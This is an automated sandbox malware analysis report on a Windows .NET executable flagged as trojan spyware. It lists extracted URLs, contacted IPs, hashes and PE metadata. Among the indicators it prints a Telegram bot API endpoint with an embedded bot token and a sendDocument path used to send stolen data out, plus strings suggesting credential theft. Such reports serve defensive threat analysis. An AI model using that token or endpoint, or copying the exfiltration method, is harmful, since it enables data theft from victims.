                http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                http://www.fontbureau.coma0%URL Reputationsafe
                http://www.fontbureau.comd0%URL Reputationsafe
                http://en.w0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                https://api.ipify.orgappdatajVuurjVuur.exe/http://TMVuQQ.com0%Avira URL Cloudsafe
                http://www.founder.com.cB0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/dz0%Avira URL Cloudsafe
                http://www.fontbureau.commTTF0%Avira URL Cloudsafe
                https://api.telegram.org4Tkh0%Avira URL Cloudsafe
                http://www.fontbureau.comcomF0%URL Reputationsafe
                http://www.fontbureau.comm0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                http://www.fontbureau.comp0%URL Reputationsafe
                http://www.fontbureau.comals0%URL Reputationsafe
                http://www.fontbureau.comitum0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/b0%URL Reputationsafe
                http://wmwpuO0P35oL9Q.com0%Avira URL Cloudsafe
                http://www.fontbureau.comcomp0%Avira URL Cloudsafe
                http://www.galapagosdesign.com/staff/dennis.htmp0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp//ra0%Avira URL Cloudsafe
                http://www.founder.com.cn/cns-ea0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                api.ipify.org.herokudns.com
                3.220.57.224
                truefalseunknown
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  api.ipify.org
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/false
                      high
                      https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/sendDocumentfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://www.fontbureau.com/designersGrzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.sajatypeworks.comivrzN2ckYW24.exe, 00000000.00000003.258445715.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257102086.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259940209.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259819475.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259520848.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257053691.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258806192.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261728305.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260344832.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257296101.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260291295.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261561559.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258343538.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260210658.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261692319.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257200608.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258935636.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261197728.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257254857.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258324367.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261444840.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers/?rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.founder.com.cn/cn/bTherzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://api.telegram.orgrzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.sakkal.comrmrzN2ckYW24.exe, 00000000.00000003.262413128.0000000005CB5000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers?rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.jiyu-kobo.co.jp/a-drzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/rzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.ipify.orgappdatajVuurjVuur.exe/http://TMVuQQ.comrzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.tiro.comrzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/dzrzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.com/designersrzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.goodfont.co.krrzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://api.telegram.org/bot5577155192:AAEz6ZTkghx2RsdTxeeE-sDulPHc5WQblVg/5596534279%discordapi%yyyrzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.founder.com.cBrzN2ckYW24.exe, 00000000.00000003.259617773.0000000005C87000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/designersSrzN2ckYW24.exe, 00000000.00000003.271274480.0000000005C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.sajatypeworks.comrzN2ckYW24.exe, 00000000.00000003.261392765.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.typography.netDrzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.founder.com.cn/cn/cTherzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmrzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.ipify.orgrzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://fontfabrik.comrzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://DynDns.comDynDNSnamejidpasswordPsi/PsirzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/DPleaserzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/Y0rzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fonts.comrzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.sandoll.co.krrzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sajatypeworks.comarzN2ckYW24.exe, 00000000.00000003.258445715.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257102086.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259940209.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259819475.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259520848.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257053691.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258806192.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261728305.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260344832.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257296101.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260291295.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261561559.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258343538.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260210658.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261692319.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257200608.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258935636.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261197728.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.257254857.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.258324367.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261444840.0000000005C9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.urwpp.deDPleaserzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.zhongyicts.com.cnrzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.sakkal.comrzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.commTTFrzN2ckYW24.exe, 00000000.00000003.271274480.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.304989135.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.272003113.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.271826229.0000000005C87000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://api.telegram.org4TkhrzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.apache.org/licenses/LICENSE-2.0rzN2ckYW24.exe, 00000000.00000003.260307774.0000000005C87000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.260356342.0000000005C87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.fontbureau.comrzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265034269.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.fontbureau.comFrzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.264972803.0000000005C8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.comitumrzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwrzN2ckYW24.exe, 00000002.00000002.522385247.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.comcomprzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://en.wikipediarzN2ckYW24.exe, 00000000.00000003.256683274.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.256591750.0000000005CA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://wmwpuO0P35oL9Q.comrzN2ckYW24.exe, 00000002.00000002.525344688.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.galapagosdesign.com/staff/dennis.htmprzN2ckYW24.exe, 00000000.00000002.304989135.0000000005C80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.jiyu-kobo.co.jp//rarzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.jiyu-kobo.co.jp/jp/rzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.comarzN2ckYW24.exe, 00000000.00000003.271274480.0000000005C88000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.304989135.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.272003113.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.271826229.0000000005C87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.comdrzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://en.wrzN2ckYW24.exe, 00000000.00000003.257245989.0000000005C86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.carterandcone.comlrzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlNrzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cnrzN2ckYW24.exe, 00000000.00000003.259617773.0000000005C87000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259464865.0000000005C87000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.259543069.0000000005C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/frere-jones.htmlrzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designers/cabarga.htmlrzN2ckYW24.exe, 00000000.00000003.265034269.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.fontbureau.comcomFrzN2ckYW24.exe, 00000000.00000003.265034269.0000000005C8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.commrzN2ckYW24.exe, 00000000.00000003.271826229.0000000005C87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.jiyu-kobo.co.jp/rzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.comprzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers8rzN2ckYW24.exe, 00000000.00000002.305428250.0000000006E92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.fontbureau.comalsrzN2ckYW24.exe, 00000000.00000003.266665020.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265445027.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.265360818.0000000005C8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.founder.com.cn/cns-earzN2ckYW24.exe, 00000000.00000003.259617773.0000000005C87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://api.telegram.orgrzN2ckYW24.exe, 00000002.00000002.525368476.0000000002ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.jiyu-kobo.co.jp/brzN2ckYW24.exe, 00000000.00000003.262479660.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.262420491.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000003.261577709.0000000005C8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            149.154.167.220
                                                            api.telegram.orgUnited Kingdom
                                                            62041TELEGRAMRUfalse
                                                            3.220.57.224
                                                            api.ipify.org.herokudns.comUnited States
                                                            14618AMAZON-AESUSfalse
                                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                                            Analysis ID:736948
                                                            Start date and time:2022-11-03 12:20:04 +01:00
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 10m 8s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:rzN2ckYW24.exe
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:14
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@5/1@3/2
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HDC Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 97%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            TimeTypeDescription
                                                            12:21:13API Interceptor488x Sleep call for process: rzN2ckYW24.exe modified
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            Process:C:\Users\user\Desktop\rzN2ckYW24.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.355304211458859
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.915053550313837
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:rzN2ckYW24.exe
                                                            File size:684032
                                                            MD5:44159444c9bc9980871b80b3ae071ffb
                                                            SHA1:baf57ff497d2e202a1a119e8719e44c0aa100475
                                                            SHA256:9e4f0e0a10a778fb94e7631c17082b44bf75170d7ca81b393574fd3f4c004f47
                                                            SHA512:5599a5eb0bf29de8db3d3177e2a80049101884fe179bdd28d24fd5d61bdcc6132444a8096f530d94c22151731d08d67835dc2a9844eb3764827bef48361be54f
                                                            SSDEEP:12288:XzFouHH1JJ2iNqkejwFGfnH/OE9ZAFAkG1Z/dSzo3Jz4ABQyxh:XCu1j1UeGPHBA4wqJzr/
                                                            TLSH:92E4124162B64F55F0BE03F90AF6921047BA7D16E662E78C5CC72AEF19A1F80C512B73
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M0................0.."...L.......>... ...`....@.. ....................................@................................
                                                            Icon Hash:ce9c9496e4949c9e
                                                            Entrypoint:0x4a3e1a
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0xBEFF304D [Fri Jul 17 21:44:45 2071 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            int CCh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            cld
                                                            aas
                                                            xor esi, dword ptr [ebx]
                                                            xor esi, dword ptr [ebx]
                                                            xor esi, dword ptr [ebx]
                                                            add eax, dword ptr [eax+00h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], dl
                                                            inc eax
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            push ss
                                                            inc eax
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            sub byte ptr [eax+66h], al
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa3dc80x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xa60000x4854.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xa3dac0x1c.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
